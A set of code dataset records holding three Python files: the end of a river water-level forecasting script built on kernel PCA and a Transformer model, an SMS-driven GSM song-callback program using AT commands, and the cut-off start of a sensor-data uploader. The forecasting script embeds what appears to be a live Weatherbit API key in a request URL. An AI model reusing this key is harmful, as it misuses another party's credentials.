df = pd.DataFrame(scaled_ds, columns=df.columns, index=df.index)\n\n #PCA AND EUCLIDEAN KERNEL\n\n # center data\n rainfall_df = df[['RF-Intensity', 'RF-Intensity.1', 'RF-Intensity.2', 'RF-Intensity.3']]\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(rainfall_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1 / len(rainfall_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n rainfall_df = np.matmul(rainfall_df, eigenvectors) \n rainfall_df = rainfall_df.iloc[:, 1]\n\n # center data\n precipitation_df = df[['Precipitation', 'Precipitation.1', 'Precipitation.2']]\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(precipitation_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1/len(precipitation_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n precipitation_df = np.matmul(precipitation_df, eigenvectors) \n precipitation_df = precipitation_df.iloc[:, 1]\n\n # center data\n humidity_df = df[['Humidity', 'Humidity.1', 'Humidity.2']]\n\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(humidity_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1/len(humidity_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n humidity_df = np.matmul(humidity_df, eigenvectors) \n humidity_df = humidity_df.iloc[:, 1]\n\n # center data\n temp_df = df[['Temperature', 'Temperature.1', 'Temperature.2']]\n\n\n\n # calculate pairwise squared Euclidean distances\n sq_dists = sc.spatial.distance.pdist(temp_df.values.T, 'sqeuclidean')\n\n # convert pairwise distances into a square matrix\n mat_sq_dists = sc.spatial.distance.squareform(sq_dists)\n\n # compute the symmetric kernel matrix.\n gamma = 1/len(temp_df.columns)\n K = np.exp(-gamma * mat_sq_dists)\n\n # center the kernel matrix.\n N = K.shape[0]\n one_n = np.ones((N, N)) / N\n K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)\n\n # calculate eigenvectors and eigenvalues\n eigenvalues, eigenvectors = np.linalg.eigh(K)\n\n # calculate components\n temp_df = np.matmul(temp_df, eigenvectors)\n temp_df = temp_df.iloc[:, 1]\n\n weather_df = pd.concat([rainfall_df, precipitation_df, humidity_df, temp_df], axis=1)\n weather_df.columns = ['Rainfall', 'Precipitation', 'Humidity', 'Temperature']\n\n river_df = df[['Waterlevel', 'Waterlevel.1', 'Waterlevel.2', 'Waterlevel.3']]\n reduced_df = pd.concat([river_df, weather_df], axis=1)\n\n\n\n\n cleanData = reduced_df\n\n\nclass TimeSeriesDataset(torch.utils.data.Dataset):\n def __init__(self, data, seq_len, step):\n self.data = data\n self.seq_len = seq_len\n self.step = step\n \n def __getitem__(self, index):\n in_start = index\n in_end = in_start + self.seq_len\n out_start = index + self.step\n out_end = out_start + self.seq_len\n \n inputs = self.data[in_start:in_end]\n labels = self.data[out_start:out_end]\n \n return inputs, labels\n \n def __len__(self):\n return len(self.data) - (self.seq_len + self.step) + 1\n\nBATCH_SIZE = 128\nSEQ_LEN = 180\nSEQ_STEP = 60\nPRED_SIZE = 8\nD_MODEL = 8\nNUM_HEADS = 4\nNUM_LAYERS = 2\nD_FF = 2048 \nDROPOUT = 0.10\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, d_model, num_heads):\n super(MultiHeadAttention, self).__init__()\n assert d_model % num_heads == 0, \"d_model must be divisible by num_heads\"\n \n self.d_model = d_model\n self.num_heads = num_heads\n self.d_k = d_model // num_heads\n \n self.W_q = nn.Linear(d_model, d_model)\n self.W_k = nn.Linear(d_model, d_model)\n self.W_v = nn.Linear(d_model, d_model)\n self.W_o = nn.Linear(d_model, d_model)\n \n def scaled_dot_product_attention(self, Q, K, V, mask=None):\n attn_scores = torch.matmul(Q, K.transpose(-2, -1)) / math.sqrt(self.d_k)\n attn_scores = attn_scores.masked_fill(mask == 0, -1e9)\n \n attn_probs = torch.softmax(attn_scores, dim=-1)\n output = torch.matmul(attn_probs, V)\n \n return attn_probs, output\n \n def split_heads(self, x):\n batch_size, seq_length, d_model = x.size()\n return x.view(batch_size, seq_length, self.num_heads, self.d_k).transpose(1, 2)\n \n def combine_heads(self, x):\n batch_size, _, seq_length, d_k = x.size()\n return x.transpose(1, 2).contiguous().view(batch_size, seq_length, self.d_model)\n \n def forward(self, Q, K, V, mask=None):\n Q = self.split_heads(self.W_q(Q))\n K = self.split_heads(self.W_k(K))\n V = self.split_heads(self.W_v(V))\n \n attn_scores, attn_output = self.scaled_dot_product_attention(Q, K, V, mask)\n output = self.W_o(self.combine_heads(attn_output))\n return attn_scores, output\n \nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model, max_seq_length=2048):\n super(PositionalEncoding, self).__init__()\n \n pe = torch.zeros(max_seq_length, d_model)\n position = torch.arange(0, max_seq_length, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model))\n \n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n \n self.register_buffer('pe', pe.unsqueeze(0))\n \n def forward(self, x):\n return x + self.pe[:, :x.size(1)]\n \nclass PositionWiseFeedForward(nn.Module):\n def __init__(self, d_model, d_ff):\n super(PositionWiseFeedForward, self).__init__()\n self.fc1 = nn.Linear(d_model, d_ff)\n self.fc2 = nn.Linear(d_ff, d_model)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.fc2(self.relu(self.fc1(x)))\n \nclass DecoderLayer(nn.Module):\n def __init__(self, d_model, num_heads, d_ff, dropout):\n super(DecoderLayer, self).__init__()\n self.self_attn = MultiHeadAttention(d_model, num_heads)\n self.feed_forward = PositionWiseFeedForward(d_model, d_ff)\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.dropout = nn.Dropout(dropout)\n \n def forward(self, x, mask=None):\n attn_scores, attn_output = self.self_attn(x, x, x, mask)\n x = self.norm1(x + self.dropout(attn_output))\n ff_output = self.feed_forward(x)\n x = self.norm2(x + self.dropout(ff_output))\n return attn_scores, x\n \nclass Transformer(nn.Module):\n def __init__(self, pred_size, d_model, num_heads, num_layers, d_ff, dropout):\n super(Transformer, self).__init__()\n self.positional_encoding = PositionalEncoding(d_model)\n self.decoder_layers = nn.ModuleList([DecoderLayer(d_model, num_heads, d_ff, dropout) for _ in range(num_layers)])\n self.fc = nn.Linear(d_model, pred_size)\n self.sigmoid = nn.Sigmoid()\n self.dropout = nn.Dropout(dropout)\n \n def generate_mask(self, tgt):\n seq_length = tgt.size(1)\n tgt_mask = (1 - torch.triu(torch.ones(1, seq_length, seq_length), diagonal=1)).bool()\n return tgt_mask\n\n def forward(self, tgt):\n mask = self.generate_mask(tgt).to(initiate_model.device)\n tgt_embedded = self.dropout(self.positional_encoding(tgt))\n\n dec_output = tgt_embedded\n for dec_layer in self.decoder_layers:\n attn_scores, dec_output = dec_layer(dec_output, mask)\n\n output = self.sigmoid(self.fc(dec_output))\n return attn_scores, output\n\n# define the model\ndecomposer = Transformer(\n pred_size=PRED_SIZE,\n d_model=D_MODEL,\n num_heads=NUM_HEADS,\n num_layers=NUM_LAYERS,\n d_ff=D_FF,\n dropout=DROPOUT\n).float()\n\ndecomposer.to(initiate_model.device)\n\ndecomposer.load_state_dict(torch.load('transformer.pth'))\n\ndecomposer.eval() # set model on test mode\n\nmydb.close()\n\ndef forecast():\n test_data = initiate_model.reduced_df[-180:].values\n test_dates = initiate_model.reduced_df[-180:].index\n test_dates = test_dates[60:240]\n\n x_test = test_data[:180]\n y_label = test_data[60:]\n y_label = initiate_model.label_scaler.inverse_transform(y_label[:, :4])\n\n x_test = np.reshape(x_test, (1, x_test.shape[0], x_test.shape[1]))\n\n decomposer.eval() # set model on test mode\n\n x_test = torch.from_numpy(x_test).float().to(initiate_model.device)\n attn_scores, y_test = decomposer(x_test) # make forecast\n y_test = y_test.detach().cpu().numpy()\n y_test = np.reshape(y_test, (y_test.shape[1], y_test.shape[2]))\n y_test = initiate_model.label_scaler.inverse_transform(y_test[:, :4])\n\n\n time_steps_per_day = 4 # Assuming 4 time steps per day (6 hours per time step)\n forecast_days = 15\n \n mydb._open_connection()\n cursor = mydb.cursor()\n cursor.execute(\"SELECT DateTime FROM rivercast.rivercast_waterlevel_prediction order by DateTime DESC LIMIT 1\")\n lastPredDT = cursor.fetchone()[0]\n formatted_lastPredDT = lastPredDT.strftime('%Y-%m-%d %H:%M:%S')\n\n # Extract the forecast for the next 15 days\n forecast_values = y_test[:forecast_days * time_steps_per_day]\n\n # Create a DataFrame with the forecasted values and dates\n forecast_dates = pd.date_range(test_dates[-1], periods=forecast_days * time_steps_per_day + 1, freq='6H')[1:]\n forecast_df = pd.DataFrame(data=forecast_values, columns=['P.Waterlevel', 'P.Waterlevel-1', 'P.Waterlevel-2', 'P.Waterlevel-3'])\n forecast_df.insert(0, \"DateTime\", forecast_dates)\n\n matches_and_following_rows_pred = forecast_df[forecast_df['DateTime'] >= formatted_lastPredDT]\n\n\n\n cursor.execute(\"SELECT DateTime FROM rivercast.rivercast_waterlevel_obs order by DateTime DESC LIMIT 1\")\n lastTrueDT = cursor.fetchone()[0] + timedelta(hours=6)\n\n # Extract the forecast for the next 15 days\n true_values = y_label[-120:]\n\n true_dates = pd.date_range(test_dates[-120], periods=120, freq='6H')[:]\n true_df = pd.DataFrame(data=true_values ,columns=['T.Waterlevel', 'T.Waterlevel-1', 'T.Waterlevel-2', 'T.Waterlevel-3']) #converting numpy to dataframe\n true_df.insert(0, \"DateTime\", true_dates) #adding DateTime column\n\n puirpose = pd.DataFrame(data=y_label ,columns=['T.Waterlevel', 'T.Waterlevel-1', 'T.Waterlevel-2', 'T.Waterlevel-3'])\n\n formatted_lastTrueDT = lastTrueDT.strftime('%Y-%m-%d %H:%M:%S')\n\n mydb.close()\n\n matches_and_following_rows = true_df[true_df['DateTime'] >= formatted_lastTrueDT]\n\n return matches_and_following_rows_pred[1:2], matches_and_following_rows\n\n\n\n\ndef getLatest_Datetime():\n mydb._open_connection()\n cursor = mydb.cursor()\n\n cursor.execute(\"SELECT Date_Time FROM rivercast.modelData order by Date_Time DESC LIMIT 1\")\n lastDTindex = cursor.fetchone()\n print(lastDTindex)\n\n\n return lastDTindex\n\n\n\ndef updateMainData():\n\n getLatest_Datetime()\n lastDTindexDef = getLatest_Datetime()\n\n ldi = str(lastDTindexDef).replace(\"(datetime.datetime(\", \"\").replace(\"),)\", \"\").replace(\", \", \"-\")\n\n lastDT = datetime.strptime(ldi, '%Y-%m-%d-%H-%M')\n\n\n # Common date calculations\n d = lastDT\n\n h = d.hour\n m = d.minute\n s = d.second\n ms = d.microsecond\n\n dday = d + timedelta(hours=1)\n\n datetoday = dday.strftime(\"%Y-%m-%d:%H\")\n\n startDate = datetoday \n\n ed = datetime.today()\n\n\n edate = ed - timedelta(minutes=m, seconds=s, microseconds=ms) + timedelta(hours=1)\n\n\n endDate = edate.strftime(\"%Y-%m-%d:%H\")\n\n # Weather data\n weatherbit = f'https://api.weatherbit.io/v2.0/history/hourly?lat=14.679696901082357&lon=121.10970052493437&start_date={startDate}&end_date={endDate}&tz=local&key=2b382660ad4843188647514206bf330e'\n wbRes = requests.get(weatherbit)\n wbReq = wbRes.json()\n print(startDate, endDate)\n try:\n wbReq = wbRes.json()\n wbitArr = []\n\n for current_weather in wbReq['data']:\n time_date = current_weather['timestamp_local']\n dpt = current_weather['dewpt']\n prsr = current_weather['pres']\n preci = current_weather['precip']\n temperature = current_weather['temp']\n humi = specific_humidity_from_dewpoint(prsr * units.hPa, dpt * units.degC).to('g/kg')\n \n strHumi = str(humi)\n humidity = strHumi.replace(\" gram / kilogram\", \"\")\n\n wbitArr.append({\n \"humidity\": humidity,\n \"precipitation\": preci,\n \"temperature\": temperature\n })\n\n weather_df = pd.DataFrame(wbitArr)\n\n weather_df['temperature1'] = weather_df['temperature'].copy()\n weather_df['humidity1'] = weather_df['humidity'].copy()\n weather_df['precipitation1'] = weather_df['precipitation'].copy()\n\n weather_df['temperature2'] = weather_df['temperature'].copy()\n weather_df['humidity2'] = weather_df['humidity'].copy()\n weather_df['precipitation2'] = weather_df['precipitation'].copy()\n\n weather_df = weather_df.reindex(columns=['humidity', 'precipitation', 'temperature', 'temperature1', 'humidity1', 'precipitation1', 'temperature2', 'humidity2', 'precipitation2'])\n\n except KeyError:\n print(\"Data are up-to-date\")\n weather_df = pd.DataFrame()\n\n # Water level data\n wlArr = []\n\n base_url = 'http://121.58.193.173:8080/water/map_list.do?ymdhm='\n obsnm_list = [\"Nangka\", \"Sto Nino\", \"Montalban\"]\n\n\n start_date = datetime(dday.year, dday.month, dday.day, dday.hour)\n end_date = datetime(edate.year, edate.month, edate.day, edate.hour)\n current_date = start_date\n\n\n try:\n for current_date in pd.date_range(start=start_date, end=end_date, freq='H'):\n formatted_date = current_date.strftime('%Y%m%d%H%M')\n url = f\"{base_url}{formatted_date}\"\n\n try:\n response = requests.get(url)\n data = response.json()\n\n entry_data = {}\n \n for entry in data:\n for i, obsnm in enumerate(obsnm_list, start=1):\n \n if obsnm in entry['obsnm']:\n year = int(formatted_date[:4])\n month = int(formatted_date[4:6])\n day = int(formatted_date[6:8])\n hour = int(formatted_date[8:10])\n waterlevel = entry.get('wl', 'null')\n \n # Remove \"(*)\" from waterlevel\n waterlevel = waterlevel.replace(\"(*)\", \"\")\n\n entry_data.update({\n \"date_time\": pd.to_datetime(f\"{year}-{month:02d}-{day:02d} {hour:02d}:00:00\"), # Create Date_Time column\n f\"station{i}\": entry['obsnm'],\n f\"year{i}\": year,\n f\"month{i}\": month,\n f\"day{i}\": day,\n f\"hour{i}\": hour,\n f\"waterlevel{i}\": waterlevel\n })\n wlArr.append(entry_data)\n\n except Exception as e:\n print(f\"No waterlevel fetched for {formatted_date}: {e}\")\n\n except KeyError:\n print(\"Water level data are up-to-date\")\n waterlevel_df = pd.DataFrame()\n\n waterlevel_df = pd.DataFrame(wlArr)\n\n # Check if 'waterlevel2' column exists before trying to access it\n if 'waterlevel2' in waterlevel_df.columns:\n waterlevel_df['waterlevel2dup'] = waterlevel_df['waterlevel2'].copy()\n else:\n print(\"Data are up-to-date\")\n\n waterlevel_df = waterlevel_df.reindex(columns=['station1', 'year1', 'month1', 'day1', 'hour1','waterlevel1', 'station2', 'year2', 'month2', 'day2', 'hour2','waterlevel2', 'waterlevel2dup', 'station3', 'year3', 'month3', 'day3', 'hour3','waterlevel3','date_time'])\n\n waterlevel_df = waterlevel_df.rename(columns={\"station1\": \"station_1\",\"station2\": \"station_2\"})\n\n\n # Rainfall data\n wlArr = []\n\n base_url = 'http://121.58.193.173:8080/rainfall/map_list.do?ymdhm='\n obsnm_list = [\"Nangka\", \"Mt. Oro\"]\n\n current_date = start_date\n\n try:\n for current_date in pd.date_range(start=start_date, end=end_date, freq='H'):\n formatted_date = current_date.strftime('%Y%m%d%H%M')\n url = f\"{base_url}{formatted_date}\"\n\n try:\n response = requests.get(url)\n data = response.json()\n\n entry_data = {}\n\n for entry in data:\n for i, obsnm in enumerate(obsnm_list, start=1):\n if obsnm in entry['obsnm']:\n rainfall = entry.get('rf', 'null')\n \n # Remove \"(*)\" from rainfall\n rainfall = rainfall.replace(\"(*)\", \"\")\n\n entry_data.update({\n f\"station{i}\": entry['obsnm'],\n f\"rainfall{i}\": rainfall,\n \"date_time\": current_date # Use current_date instead of start_date\n })\n\n wlArr.append(entry_data)\n\n except Exception as e:\n print(f\"No rainfall data fetched for {formatted_date}: {e}\")\n\n except KeyError:\n print(\"Rainfall data are up-to-date\")\n rainfall_df = pd.DataFrame()\n\n rainfall_df = pd.DataFrame(wlArr)\n\n # Check if 'rainfall1' column exists before trying to access it\n if 'rainfall1' in rainfall_df.columns:\n rainfall_df['rainfall1dup'] = rainfall_df['rainfall1']\n else:\n print(\"Data are up-to-date\")\n updatedData = \"\"\n # Similarly, check for 'rainfall2' column\n if 'rainfall2' in rainfall_df.columns:\n rainfall_df['rainfall2dup'] = rainfall_df['rainfall2']\n else:\n updatedData = \"Data are up-to-date\"\n\n rainfall_df = rainfall_df.reindex(columns=['station1', 'rainfall1', 'rainfall1dup', 'station2', 'rainfall2', 'rainfall2dup'])\n\n\n # Consolidate all data into one DataFrame\n merged_df = pd.concat([waterlevel_df, rainfall_df, weather_df], axis=1).dropna()\n\n\n # Assuming your DataFrame is called merged_df\n new_columns = {\n 'station_1': 'Station',\n 'year1': 'Year',\n 'month1': 'Month',\n 'day1': 'Day',\n 'hour1': 'Hour',\n 'waterlevel1': 'Waterlevel',\n 'station_2': 'Station.1',\n 'year2': 'Year.1',\n 'month2': 'Month.1',\n 'day2': 'Day.1',\n 'hour2': 'Hour.1',\n 'waterlevel2': 'Waterlevel.1',\n 'waterlevel2dup': 'Waterlevel.2',\n 'station3': 'Station.2',\n 'year3': 'Year.2',\n 'month3': 'Month.2',\n 'day3': 'Day.2',\n 'hour3': 'Hour.2',\n 'waterlevel3': 'Waterlevel.3',\n 'station1': 'RF-Station',\n 'rainfall1': 'RF-Intensity',\n 'rainfall1dup': 'RF-Intensity.1',\n 'station2': 'RF-Station.1',\n 'rainfall2': 'RF-Intensity.2',\n 'rainfall2dup': 'RF-Intensity.3',\n 'humidity': 'Humidity',\n 'precipitation': 'Precipitation',\n 'temperature': 'Temperature',\n 'temperature1': 'Temperature.1',\n 'humidity1': 'Humidity.1',\n 'precipitation1': 'Precipitation.1',\n 'temperature2': 'Temperature.2',\n 'humidity2': 'Humidity.2',\n 'precipitation2': 'Precipitation.2',\n 'date_time': 'Date_Time'\n }\n\n merged_df.rename(columns=new_columns, inplace=True)\n\n\n # Save to CSV\n merged_df.to_csv('consolidated_data.csv', index=False)\n mydb.close()\n\n return merged_df, updatedData\n\n\n\n\ndef getAttnScores():\n test_data = initiate_model.reduced_df['2023-09-27':].values\n test_dates = initiate_model.reduced_df['2023-09-27':].index\n test_dates = test_dates[60:240]\n\n x_test = test_data[:180]\n y_label = test_data[60:180]\n y_label = initiate_model.label_scaler.inverse_transform(y_label[:, :4])\n\n x_test = np.reshape(x_test, (1, x_test.shape[0], x_test.shape[1]))\n\n decomposer.eval() # set model on test mode\n\n x_test = torch.from_numpy(x_test).float().to(initiate_model.device)\n attn_scores, y_test = decomposer(x_test) # make forecast\n y_test = y_test.detach().cpu().numpy()\n y_test = np.reshape(y_test, (y_test.shape[1], y_test.shape[2]))\n y_test = initiate_model.label_scaler.inverse_transform(y_test[:, :4])\n\n # plot predictions\n for i in [0, 1, 2, 3]:\n plt.plot(np.convolve(y_test[:, i], np.ones(30), 'valid') / 30)\n plt.plot(y_label[30:, i], color='k', alpha=0.3)\n plt.show()\n\n # plot attention scores\n attn_scores = torch.squeeze(attn_scores, dim=0)\n attn_scores = attn_scores.detach().cpu().numpy() # transfer output from GPU to CPU\n \n \n attention_score_images = []\n\n for idx, attention in enumerate(attn_scores):\n selected_attention = attention[10:]\n selected_attention = block_reduce(selected_attention, (15, 15), np.max)\n\n fig, ax = plt.subplots()\n ax.matshow(selected_attention, cmap='viridis')\n\n # Save the plot to a BytesIO object\n image_stream = io.BytesIO()\n plt.savefig(image_stream, format='png')\n image_stream.seek(0)\n\n # Append the image stream to the list\n attention_score_images.append(image_stream)\n\n # Return the list of attention score images\n return attention_score_images","repo_name":"hephaestus25/ModelAPI","sub_path":"RiverCastAPI/rivercastModel.py","file_name":"rivercastModel.py","file_ext":"py","file_size_in_byte":25791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40947093682","text":"from __future__ import print_function\nimport logging\nimport serial\nimport serial.threaded\nimport threading\nimport time\nimport re\nimport os\nimport sys\nfrom messaging.sms import SmsDeliver, SmsSubmit\nfrom enum import Enum\n\nif os.name == 'posix' and sys.version_info[0] < 3:\n\timport subprocess32 as subprocess\nelse:\n import subprocess\n\ntry:\n\timport queue\nexcept ImportError:\n\timport Queue as queue\n\nclass ATException(Exception):\n\tpass\n\nclass Status(Enum):\n\tIDLE = 0\n\tINCOMING_SMS = 1\n\tACTIVE_CALL = 2\n\tINCOMING_CALL = 3\n\ndef print_dbg(*args):\n\tprint(*args) # uncomment do enable debug\n\treturn\n\nclass WurlitzerProtocol(serial.threaded.LineReader):\n\n\tTERMINATOR = b'\\r\\n'\n\tCLCC_REGEX = re.compile(r'\\+CLCC: (\\d),(\\d),(\\d),(\\d),(\\d),\"(.+)\",(\\d{1,3}),\"(.*)\"')\n\tCALL_STATES = ['BUSY', 'RING', 'NO CARRIER', 'NO ANSWER', 'NO DIALTONE']\n\n\tdef __init__(self):\n\t\tsuper(WurlitzerProtocol, self).__init__()\n\t\tself.alive = True\n\t\tself.playlist = {}\n\t\tself.status = Status.IDLE\n\t\tself.responses = queue.Queue()\n\t\tself.events = queue.Queue()\n\t\tself.clcc_outgoing = queue.Queue()\n\t\tself.clcc_incoming = queue.Queue()\n\t\tself._event_thread = threading.Thread(target=self.__run_event)\n\t\tself._event_thread.daemon = True\n\t\tself._event_thread.name = \"wrlz-event\"\n\t\tself._event_thread.start()\n\t\tself.lock = threading.Lock()\n\n\tdef stop(self):\n\t\tself.alive = False\n\t\tself.events.put(None)\n\t\tself.responses.put('')\n\n\tdef __run_event(self):\n\t\twhile self.alive:\n\t\t\ttry:\n\t\t\t\tself.__handle_event(self.events.get())\n\t\t\texcept:\n\t\t\t\tlogging.exception('_run_event')\n\n\tdef init_module(self):\n\t\tself.command('ATE0')\t\t# disable echo\n\t\tself.command('AT+CFUN=1')\t# enable full functionality\n\t\tself.command('AT+COLP=0')\t# do not block on ATD...\n\t\tself.command('AT+CLCC=1')\t# report state of current calls\n\t\tself.command('AT+CLIP=0')\t# do not indicate incomming call via '+CLIP:...'\n\t\tself.command('AT+CMGF=0')\t# enable PDU mode for SMS\n\t\tself.command('AT+CNMI=2,2')\t# handle SMS directly via '+CMT:...'\n\n\tdef load_playlist(self, path):\n\t\twith open(path) as f:\n \t\t\tself.playlist = dict(l.rstrip().split(None, 1) for l in f)\n\n\tdef handle_line(self, line):\n\t\tprint_dbg('INPUT: ', line)\n\t\tif self.status == Status.INCOMING_SMS:\n\t\t\tself.events.put(line)\n\t\t\treturn\n\n\t\tclcc_match = self.CLCC_REGEX.match(line)\n\t\tif clcc_match != None and clcc_match.group(2) == '0':\n\t\t\t# outgoing call\n\t\t\tself.clcc_outgoing.put(line)\n\t\telif clcc_match != None and clcc_match.group(2) == '1': \n\t\t\t# incoming call\n\t\t\tself.clcc_incoming.put(line)\n\t\telif line.startswith('+CMT'):\n\t\t\t# set status; next line is PDU\n\t\t\tself.status = Status.INCOMING_SMS\n\t\telif line.startswith('+CMGS'):\n\t\t\t# last sent SMS-identifier\n\t\t\tself.responses.put(line);\n\t\telif line in self.CALL_STATES:\n\t\t\tprint_dbg('ignore call state: ', line)\n\t\telif line.startswith('+'):\n\t\t\tself.events.put(line)\n\t\telse:\n\t\t\tself.responses.put(line)\n\n\tdef __handle_event(self, event):\n\t\tprint_dbg('event received:', event)\n\t\tif self.status == Status.INCOMING_SMS:\n\t\t\tself.status = Status.IDLE\n\t\t\tself.__handle_sms(event)\n\n\tdef __handle_sms(self, pdu):\n\t\tsms = SmsDeliver(pdu)\n\t\tprint_dbg('SMS from:', sms.number, 'text:', sms.text);\n\t\tcmd = sms.text.split(None, 1)[0] # only use first word\n\t\tif cmd in self.playlist.keys():\n\t\t\tsong = self.playlist.get(cmd)\n\t\t\tprint_dbg('PLAY: ', cmd)\n\t\t\tself.__place_call(sms.number, song)\n\t\telse:\n\t\t\tprint_dbg('SEND PLAYLIST')\n\t\t\tresponse = SmsSubmit(sms.number, 'Select song:\\n> ' + '\\n> '.join(self.playlist.keys()))\n\t\t\tfor resp_pdu in response.to_pdu():\n\t\t\t\tprint_dbg('RESP:', resp_pdu.pdu)\n\t\t\t\t# cannot wait for response '> ' due to missing '\\r'\n\t\t\t\tself.command(b'AT+CMGS=%d' % resp_pdu.length, None)\n\t\t\t\ttime.sleep(1) # just wait 1sec instead\n\t\t\t\tself.command(b'%s\\x1a' % resp_pdu.pdu)\n\n\tdef __place_call(self, number, song):\n\t\tprint_dbg('Calling: ', number)\n\t\tself.command('ATD%s;' % number)\n\t\tcall_state = 'CALLING'\n\t\ttimeout_cnt = 3\n\t\tplayer = None\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tclcc = self.clcc_outgoing.get(timeout = 10)\n\t\t\t\tprint_dbg('CLCC: ', clcc)\n\t\t\t\tstatus = self.CLCC_REGEX.match(clcc).group(3)\n\t\t\t\tif status == '0': # ACTIVE\n\t\t\t\t\tprint_dbg('ACTIVE')\n\t\t\t\t\tcall_state = 'PLAYING'\n\t\t\t\t\tplayer = subprocess.Popen(['mpg123', '-q', song])\n\t\t\t\t\tprint_dbg('PLAYING: ', song)\n\t\t\t\telif status == '2': # DAILING\n\t\t\t\t\tprint_dbg('DAILING')\n\t\t\t\telif status == '3': # ALERTING (ring?)\n\t\t\t\t\tprint_dbg('ALERTING')\n\t\t\t\telif status == '6': # DISCONNECT\n\t\t\t\t\tprint_dbg('DISCONNECT')\n\t\t\t\t\tif player != None:\n\t\t\t\t\t\tplayer.kill()\n\t\t\t\t\treturn\n\t\t\texcept queue.Empty:\n\t\t\t\tprint_dbg('queue empty')\n\t\t\t\tif call_state == 'CALLING':\n\t\t\t\t\ttimeout_cnt -= 1\n\t\t\t\t\tprint_dbg('TIMEOUT ', timeout_cnt)\n\t\t\t\telif call_state == 'PLAYING':\n\t\t\t\t\tif player.poll() != None:\n\t\t\t\t\t\tprint_dbg('SONG FINISHED - HANGUP')\n\t\t\t\t\t\tplayer = None\n\t\t\t\t\t\tself.command('ATH')\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint_dbg('still playing')\n\t\t\t\tif timeout_cnt <= 0:\n\t\t\t\t\tprint_dbg('TIMEOUT - HANGUP')\n\t\t\t\t\tself.command('ATH')\n\n\n\tdef __handle_call(self, line):\n\t\tprint_dbg('TODO handle call')\n\n\tdef command(self, command, response='OK', timeout=10):\n\t\twith self.lock:\n\t\t\tself.write_line(command)\n\t\t\tif response is None:\n\t\t\t\treturn\n\t\t\tlines = []\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tline = self.responses.get(timeout=timeout)\n\t\t\t\t\tif line == response:\n\t\t\t\t\t\treturn lines\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint_dbg('CHECK RESPONSE: ', line)\n\t\t\t\t\t\tlines.append(line)\n\t\t\t\texcept queue.Empty:\n\t\t\t\t\traise ATException('AT command timeout ({!r})'.format(command))\n\nif __name__ == '__main__':\n\timport time\n\tser = serial.serial_for_url('/tmp/ttyV0', baudrate=9600, timeout=1)\n\twith serial.threaded.ReaderThread(ser, WurlitzerProtocol) as wurlitzer:\n\t\twurlitzer.init_module()\n\t\twurlitzer.load_playlist('playlist.txt')\n\t\twurlitzer.command('AT')\n\t\traw_input('Press Enter to continue')\n\n","repo_name":"sehaas/gsmwurlitzer","sub_path":"wurlitzer.py","file_name":"wurlitzer.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4278181148","text":"\"\"\"\r\nReads JSON files and uploads sensor data to the 52North SOS implementation. Code is tuned to work with data from SmartSantander project: http://www.smartsantander.eu/\r\nIt formats data into the body of POST request using JSON, and uploads data into a SOS with a JSON binding.\r\nA JSON file with the following structure is required:\r\n{\"markers\": [ {\"id\": \"anyvalue\", \"anyelement\": \"anyvalue\",... , ...\"tags\": \"from an specified list of tags\"}]}\r\nPermission to perform transactional operations should be enable in the SOS.\r\nRedundant data (e.g., data with the same Id and time stamp) is ignored.\r\n\r\nIt includes several options to upload data using multiple threads. This may crash the service if it cannot handle all request, this depends on the rubustness of the server and the SOS implementation itself.\r\n\r\nCreate: May 25, 2017\r\nAuthor: Manuel G. Garcia\r\n\r\n\"\"\"\r\n\r\nimport json as json\r\nimport os\r\nimport re\r\nimport glob\r\nimport datetime\r\nimport requests\r\nimport concurrent.futures\r\nimport time as time_\r\nfrom . import wrapper\r\nfrom . import transactional\r\n\r\n# OM_types dictionary\r\nom_types = {\"m\": \"OM_Measurement\",\r\n \"co\": \"OM_CategoryObservation\",\r\n \"cto\": \"OM_CountObservation\",\r\n \"to\": \"OM_TextObservation\",\r\n \"go\": 